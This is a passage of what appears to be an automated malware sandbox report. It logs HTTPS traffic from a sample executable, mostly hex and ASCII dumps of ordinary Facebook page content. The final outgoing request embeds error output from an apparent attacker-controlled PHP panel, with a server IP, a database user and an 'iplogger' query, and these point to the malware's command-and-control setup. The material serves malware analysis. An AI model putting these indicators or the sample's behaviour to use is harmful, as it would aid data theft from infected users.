Alliance\u003C\/a> in the US, the \u003Ca
2022-10-07 13:59:00 UTC	428	IN	Data Raw: 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 30 6e 4f 38 42 6b 7a 66 72 37 68 79 52 4c 75 64 50 47 71 53 34 51 6c 37 2d 6c 35 4d 4b 6a 68 43 79 75 70 61 54 76 49 2d 6d 70 62 65 68 59 46 59 56 6e 68 36 72 42 38 45 53 77 53 52 54 76 71 58 53 68 43 38 Data Ascii: iew the following resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&h=AT0nO8Bkzfr7hyRLudPGqS4Ql7-l5MKjhCyupaTvI-mpbehYFYVnh6rB8ESwSRTvqXShC8
2022-10-07 13:59:00 UTC	429	IN	Data Raw: 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 35 38 66 32 65 31 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 Data Ascii: >Controlling cookies with browser settings\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_2myvABqqKqq sx_58f2e1\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"
2022-10-07 13:59:00 UTC	431	IN	Data Raw: 77 48 64 49 71 44 78 37 39 52 56 44 6d 66 33 33 4c 79 70 6d 4d 52 43 72 37 38 72 61 79 42 78 50 37 70 4a 32 44 75 75 69 39 37 77 45 44 75 6c 71 78 53 47 34 79 72 58 32 62 4c 54 68 65 57 45 7a 67 66 6f 6a 6f 51 64 39 42 37 64 65 45 51 6d 41 67 59 48 4f 50 57 47 64 53 49 58 47 7a 55 6d 65 59 54 76 50 51 48 33 4d 47 44 46 4e 43 49 34 76 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 Data Ascii: wHdIqDx79RVDmf33LypmMRCr78rayBxP7pJ2Duui97wEDulqxSG4yrX2bLTheWEzgfojoQd9B7deEQmAgYHOPWGdSIXGzUmeYTvPQH3MGDFNCI4vQ\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Internet Explorer\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.faceb
2022-10-07 13:59:00 UTC	432	IN	Data Raw: 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 63 6a 66 56 6a 32 32 51 5a 6d 45 30 49 75 62 46 64 6b 56 43 5a 48 4b 4a 57 32 72 34 70 38 6a 57 46 5a 64 62 59 4f 47 38 55 5a 4d 4a 36 48 33 55 77 6c 49 47 44 32 6c 54 59 67 44 6b 79 4f 68 64 44 49 6e 64 4c 51 59 72 4c 49 39 4b 6b 64 68 62 62 51 74 61 65 6d 73 38 4e 55 36 4d 48 54 50 75 42 5a 50 36 30 73 31 42 48 39 63 5a 5a 37 55 6a Data Ascii: /l.php?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252F&h=AT2cjfVj22QZmE0IubFdkVCZHKJW2r4p8jWFZdbYOG8UZMJ6H3UwlIGD2lTYgDkyOhdDIndLQYrLI9KkdhbbQtaems8NU6MHTPuBZP60s1BH9cZZ7Uj
2022-10-07 13:59:00 UTC	434	IN	Data Raw: 37 39 5f 30 5f 36 5f 5c 2f 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 37 35 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 5a 55 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 36 32 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 4d 61 67 79 61 72 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 45 4e 22 2c 7b Data Ascii: 79_0_6_\/e",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_75",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_ZU",{"__html":"Italiano"},1],["__markup_3310c079_0_9_62",{"__html":"Magyar"},1],["__markup_3310c079_0_a_EN",{
2022-10-07 13:59:00 UTC	435	IN	Data Raw: 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 70 6d 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 79 64 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 2b 54 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 7d 2c 31 5d 5d 2c 22 65 6c 65 6d 65 6e 74 73 22 3a 5b 5b 22 5f 5f 65 6c 65 Data Ascii: tml":"\u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_pm",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_3310c079_0_u_yd",{"__html":"\u65e5\u672c\u8a9e"},1],["__markup_3310c079_0_v_+T",{"__html":"\ud55c\uad6d\uc5b4"},1]],"elements":[["__ele
2022-10-07 13:59:00 UTC	437	IN	Data Raw: 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 Data Ascii: ql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.1
2022-10-07 13:59:00 UTC	438	IN	Data Raw: 35 38 38 66 35 30 37 5f 30 5f 30 5f 4e 31 22 7d 5d 5d 2c 5b 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 57 65 62 56 69 72 74 75 61 6c 43 75 72 73 6f 72 43 6c 69 63 6b 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 65 39 34 64 64 38 5f 30 5f 30 5f 57 6f 22 2c 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 4e 31 22 5d 2c 5b 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 65 39 34 64 64 38 5f 30 5f 30 5f 57 6f 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 4e 31 22 7d 5d 5d 5d 2c 5b 22 4b 65 79 62 6f 61 72 64 41 63 74 69 76 69 74 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 46 6f 63 75 73 52 69 6e 67 22 2c 22 69 6e 69 74 22 2c 5b 5d Data Ascii: 588f507_0_0_N1"}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_45e94dd8_0_0_Wo","__elem_a588f507_0_0_N1"],[[{"__m":"__elem_45e94dd8_0_0_Wo"},{"__m":"__elem_a588f507_0_0_N1"}]]],["KeyboardActivityLogger","init",[],[]],["FocusRing","init",[]
2022-10-07 13:59:00 UTC	439	IN	Data Raw: 2c 6e 75 6c 6c 2c 74 72 75 65 2c 7b 22 70 75 62 4b 65 79 22 3a 7b 22 70 75 62 6c 69 63 4b 65 79 22 3a 22 30 63 30 35 34 64 38 65 62 34 61 62 30 37 62 35 32 33 63 36 61 64 62 35 30 35 61 37 36 35 38 36 34 61 37 31 32 62 35 36 32 37 34 63 61 35 36 31 36 30 38 37 31 34 32 31 38 61 35 36 38 33 35 38 22 2c 22 6b 65 79 49 64 22 3a 34 30 7d 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 63 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 49 44 22 3a 22 65 6d 61 69 6c 22 2c 22 73 65 72 76 65 72 50 72 65 66 69 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 Data Ascii: ,null,true,{"pubKey":{"publicKey":"0c054d8eb4ab07b523c6adb505a765864a712b56274ca561608714218a568358","keyId":40}}]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"contactpointFieldID":"email","serverPrefill":""}]],["BrowserPrefillLogging","
2022-10-07 13:59:00 UTC	441	IN	Data Raw: 75 73 28 29 3b 20 7d 20 63 61 74 63 68 20 28 5f 69 67 6e 6f 72 65 29 20 7b 20 7d 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 6e 6f 77 5f 69 6e 6c 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 3b 72 65 74 75 72 6e 20 70 26 26 70 2e 6e 6f 77 26 26 70 2e 74 69 6d 69 6e 67 26 26 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 6e 6f 77 28 29 2b 70 2e 74 69 6d 69 6e 67 2e 6e 61 76 69 67 61 74 69 6f 6e 53 74 61 72 74 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 7d 3b 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 Data Ascii: us(); } catch (_ignore) { }});</script><script>now_inl=(function(){var p=window.performance;return p&&p.now&&p.timing&&p.timing.navigationStart?function(){return p.now()+p.timing.navigationStart}:function(){return new Date().getTime()};})();window.__bigP
2022-10-07 13:59:00 UTC	442	IN	Data Raw: 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 69 2f 72 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 34 49 7a 43 49 53 32 35 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 6e 2f 72 2f 47 32 6d 61 49 71 32 6b 57 43 56 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 Data Ascii: ><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="4IzCIS25" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/G2maIq2kWCV.js?_nc_x=Ij3Wp8lg5Kz" as="script"
2022-10-07 13:59:00 UTC	443	IN	Data Raw: 74 73 5f 61 73 61 70 22 3a 74 72 75 65 2c 22 64 69 73 70 61 74 63 68 5f 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 34 49 7a 43 49 53 32 35 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 34 49 7a Data Ascii: ts_asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script><script nonce="4IzCIS25">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})})();</script><script nonce="4Iz
2022-10-07 13:59:00 UTC	445	IN	Data Raw: 6f 64 73 3a 7b 64 65 66 69 6e 65 3a 5b 5b 22 54 69 6d 65 53 6c 69 63 65 49 6e 74 65 72 61 63 74 69 6f 6e 53 56 22 2c 5b 5d 2c 7b 6f 6e 5f 64 65 6d 61 6e 64 5f 72 65 66 65 72 65 6e 63 65 5f 63 6f 75 6e 74 69 6e 67 3a 74 72 75 65 2c 6f 6e 5f 64 65 6d 61 6e 64 5f 70 72 6f 66 69 6c 69 6e 67 5f 63 6f 75 6e 74 65 72 73 3a 74 72 75 65 2c 64 65 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 30 2c 6c 69 74 65 5f 64 65 66 61 75 6c 74 5f 72 61 74 65 3a 31 30 30 2c 69 6e 74 65 72 61 63 74 69 6f 6e 5f 74 6f 5f 6c 69 74 65 5f 63 6f 69 6e 66 6c 69 70 3a 7b 41 44 53 5f 49 4e 54 45 52 46 41 43 45 53 5f 49 4e 54 45 52 41 43 54 49 4f 4e 3a 30 2c 61 64 73 5f 70 65 72 66 5f 73 63 65 6e 61 72 69 6f 3a 30 2c 61 64 73 5f 77 61 69 74 5f 74 69 6d 65 3a 30 2c 45 76 65 6e 74 3a 31 7d 2c Data Ascii: ods:{define:[["TimeSliceInteractionSV",[],{on_demand_reference_counting:true,on_demand_profiling_counters:true,default_rate:1000,lite_default_rate:100,interaction_to_lite_coinflip:{ADS_INTERFACES_INTERACTION:0,ads_perf_scenario:0,ads_wait_time:0,Event:1},
2022-10-07 13:59:00 UTC	446	IN	Data Raw: 30 43 75 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 31 37 34 33 39 22 2c 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 30 4f 4a 62 36 74 4e 47 4d 64 31 6c 37 62 7a 6e 64 6b 37 45 6b 45 56 61 39 55 48 4a 51 36 67 33 42 50 32 37 5a 47 78 48 61 6e 7a 71 6a 5f 33 4b 46 6b 47 49 74 45 6b 6e 6e 6c 39 6a 53 47 41 41 59 76 6a 61 45 54 64 43 44 54 59 6e 30 67 4b 63 77 42 33 69 74 30 43 75 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 38 38 35 37 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 5f 57 71 54 6d 48 79 47 65 32 77 35 52 4c 65 4e 53 46 51 7a 73 4d 30 59 36 78 4b 37 65 4f 4f 41 68 42 4a 30 6a 33 78 6b 33 4c 5a 47 Data Ascii: 0Cuc"]},-1],["cr:917439",["PageTransitionsBlue"],{__rc:["PageTransitionsBlue","Aa0OJb6tNGMd1l7bzndk7EkEVa9UHJQ6g3BP27ZGxHanzqj_3KFkGItEknnl9jSGAAYvjaETdCDTYn0gKcwB3it0Cuc"]},-1],["cr:1108857",[],{__rc:[null,"Aa1_WqTmHyGe2w5RLeNSFQzsM0Y6xK7eOOAhBJ0j3xk3LZG
2022-10-07 13:59:00 UTC	448	IN	Data Raw: 5f 6a 61 76 61 73 63 72 69 70 74 5f 74 72 61 63 65 22 2c 22 61 72 74 69 6c 6c 65 72 79 5f 6c 6f 67 67 65 72 5f 64 61 74 61 22 2c 22 6c 6f 67 67 65 72 22 2c 22 66 61 6c 63 6f 22 2c 22 67 6b 32 5f 65 78 70 6f 73 75 72 65 22 2c 22 6a 73 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 22 2c 22 6c 6f 6f 6d 5f 74 72 61 63 65 22 2c 22 6d 61 72 61 75 64 65 72 22 2c 22 70 65 72 66 78 5f 63 75 73 74 6f 6d 5f 6c 6f 67 67 65 72 5f 65 6e 64 70 6f 69 6e 74 22 2c 22 71 65 78 22 2c 22 72 65 71 75 69 72 65 5f 63 6f 6e 64 5f 65 78 70 6f 73 75 72 65 5f 6c 6f 67 67 69 6e 67 22 5d 2c 73 68 6f 75 6c 64 5f 64 72 6f 70 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 74 72 75 65 2c 73 68 6f 75 6c 64 5f 6c 6f 67 5f 75 6e 6b 6e 6f 77 6e 5f 72 6f 75 74 65 73 3a 66 61 6c 73 65 7d 2c 37 5d Data Ascii: _javascript_trace","artillery_logger_data","logger","falco","gk2_exposure","js_error_logging","loom_trace","marauder","perfx_custom_logger_endpoint","qex","require_cond_exposure_logging"],should_drop_unknown_routes:true,should_log_unknown_routes:false},7]
2022-10-07 13:59:00 UTC	449	IN	Data Raw: 74 47 50 54 7a 6a 51 5a 64 54 4c 48 6b 69 33 68 69 7a 37 63 42 77 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 33 33 35 39 22 2c 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 49 6d 70 6c 46 6f 72 42 6c 75 65 22 2c 22 41 61 32 78 46 50 32 39 72 31 76 74 48 4c 48 58 46 48 57 4b 2d 44 75 75 4d 56 5a 49 64 64 31 6c 2d 4e 31 36 30 6d 6b 64 71 74 44 30 51 67 51 44 4a 50 5a 75 41 56 4e 73 6a 4d 39 75 61 72 46 75 76 6b 35 5a 54 2d 58 70 55 78 41 67 30 59 42 54 62 54 78 4c 77 73 4c 62 77 51 2d 4a 31 68 35 69 73 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 54 72 61 63 6b 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 64 6f 6d 61 69 6e 3a 22 68 74 74 70 73 3a 2f 2f 70 69 Data Ascii: tGPTzjQZdTLHki3hiz7cBwU"]},-1],["cr:1353359",["EventListenerImplForBlue"],{__rc:["EventListenerImplForBlue","Aa2xFP29r1vtHLHXFHWK-DuuMVZIdd1l-N160mkdqtD0QgQDJPZuAVNsjM9uarFuvk5ZT-XpUxAg0YBTbTxLwsLbwQ-J1h5isg"]},-1],["TrackingConfig",[],{domain:"https://pi
2022-10-07 13:59:00 UTC	451	IN	Data Raw: 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e Data Ascii: k.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/in
2022-10-07 13:59:00 UTC	452	IN	Data Raw: 6f 4c 6f 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 57 65 62 53 74 6f 72 61 67 65 4d 6f 6e 73 74 65 72 22 2c 22 73 63 68 65 64 75 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 41 72 74 69 6c 6c 65 72 79 22 2c 22 64 69 73 61 62 6c 65 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 53 63 72 69 70 74 50 61 74 68 4c 6f 67 67 65 72 22 2c 22 73 74 61 72 74 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 54 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 70 44 42 41 59 35 78 47 62 55 6d 64 2d 65 4c 63 6c 42 68 35 44 74 36 75 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 Data Ascii: oLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","pDBAY5xGbUmd-eLclBh5Dt6u",63072000000,"/",t

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49710	31.13.92.36	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:59:18 UTC	453	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3C